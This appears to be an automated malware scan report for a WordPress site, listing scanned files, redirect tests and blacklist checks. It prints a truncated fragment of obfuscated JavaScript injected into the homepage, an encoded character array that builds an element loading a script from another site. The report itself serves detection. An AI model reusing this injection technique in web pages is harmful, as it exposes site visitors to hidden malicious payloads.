Scanned pages/files
| Request | Server response | Status |
http://www.mozgoweb.com/ | 200 OK Content-Length: 85300 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ss=eval(\"Str\"+\"ing\");d=document;a=\"68,77,70,65,76,6b,71,70,22,7c,7c,7c,68,68,68,2a,2b,22,7d,f,c,22,22,22,22,78,63,74,22,79,6a,79,66,65,22,3f,22,66,71,65,77,6f,67,70,76,30,65,74,67,63,76,67,47,6e,67,6f,67,70,76,2a,29,6b,68,74,63,6f,67,29,2b,3d,f,c,f,c,22,22,22,22,79,6a,79,66,65,30,75,74,65,22,3f,22,29,6a,76,76,72,3c,31,31,79,79,79,30,6a,63,74,74,7b,6a,71,70,76,7c,72,6a,71,76,71,30,65,71,6f,31,6f,7b,63,6e,64,77,6f,61,68,6b,6e,67,75,31,66,76,66,30,72,6a,72,29,3d,f,c,22,22,22,22,79,6a,79,66,65, Antivirus reports:
| ||
http://www.mozgoweb.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-content/themes/carrington-blog/js/carrington.js?ver=1.0 | 200 OK Content-Length: 1714 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/si_captcha.js?ver=3.9.1 | 200 OK Content-Length: 1700 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-content/plugins/google-syntax-highlighter/Scripts/shCore.js | 200 OK Content-Length: 10858 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-content/plugins/google-syntax-highlighter/Scripts/shBrushCSharp.js | 200 OK Content-Length: 2046 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-content/plugins/google-syntax-highlighter/Scripts/shBrushPhp.js | 200 OK Content-Length: 4430 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-content/plugins/google-syntax-highlighter/Scripts/shBrushJScript.js | 200 OK Content-Length: 1266 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-content/plugins/google-syntax-highlighter/Scripts/shBrushJava.js | 200 OK Content-Length: 1481 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-content/plugins/google-syntax-highlighter/Scripts/shBrushVb.js | 200 OK Content-Length: 1660 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-content/plugins/google-syntax-highlighter/Scripts/shBrushSql.js | 200 OK Content-Length: 2541 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-content/plugins/google-syntax-highlighter/Scripts/shBrushXml.js | 200 OK Content-Length: 2379 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-content/plugins/google-syntax-highlighter/Scripts/shBrushDelphi.js | 200 OK Content-Length: 2080 Content-Type: application/javascript | clean |
http://www.mozgoweb.com/wp-content/plugins/google-syntax-highlighter/Scripts/shBrushPython.js | 200 OK Content-Length: 1504 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mozgoweb.com
Result:
GET / HTTP/1.1
Host: mozgoweb.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: mozgoweb.com
Referer: http://www.google.com/search?q=mozgoweb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mozgoweb.com
Referer: http://www.google.com/search?q=mozgoweb.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mozgoweb.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mozgoweb.com/
Result: mozgoweb.com is not infected or malware details are not published yet.
Result: mozgoweb.com is not infected or malware details are not published yet.